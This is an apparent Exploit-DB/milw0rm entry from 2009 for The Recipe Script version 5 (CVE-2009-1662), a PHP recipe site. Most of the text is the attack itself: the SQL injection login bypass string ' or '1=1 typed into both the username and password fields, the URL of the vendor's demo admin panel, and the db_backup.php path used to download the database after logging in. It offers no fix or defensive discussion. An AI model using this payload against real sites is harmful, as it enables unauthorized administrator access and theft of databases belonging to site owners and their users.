The Recipe Script 5 Auth Bypass SQL Injection / DB Backup Vulns

2009-05-08T00:00:00
ID EDB-ID:8642
Type exploitdb
Reporter TiGeR-Dz
Modified 2009-05-08T00:00:00

Description

The Recipe Script 5 (Auth Bypass) SQL Injection / DB Backup Vulns. CVE-2009-1662. Webapps exploit for php platform

                                        
                                            -----------------------------------------------------
The Recipe Script version 5 (Auth Bypass) Remote Sql Injecion/ Database Backup Exploit
-----------------------------------------------------
Founder: TiGeR-Dz
script:The Recipe Script version 5
downlaod:http://recipescript.com/
-----------------------------------------------------------
-----------------------------------------------------------
(Auth Bypass) Remote Sql Injecion
--------------------------------
username:  ' or '1=1
Password:  ' or '1=1

demo:
-----
http://recipescript.com/demo/admin/index.php
------------------------------------------------------
Database Backup Exploit:
-------------------------
After login to administration panel to get Backup

http://recipescript.com/demo/admin/db_backup.php

--------------------------------------------------------

# milw0rm.com [2009-05-08]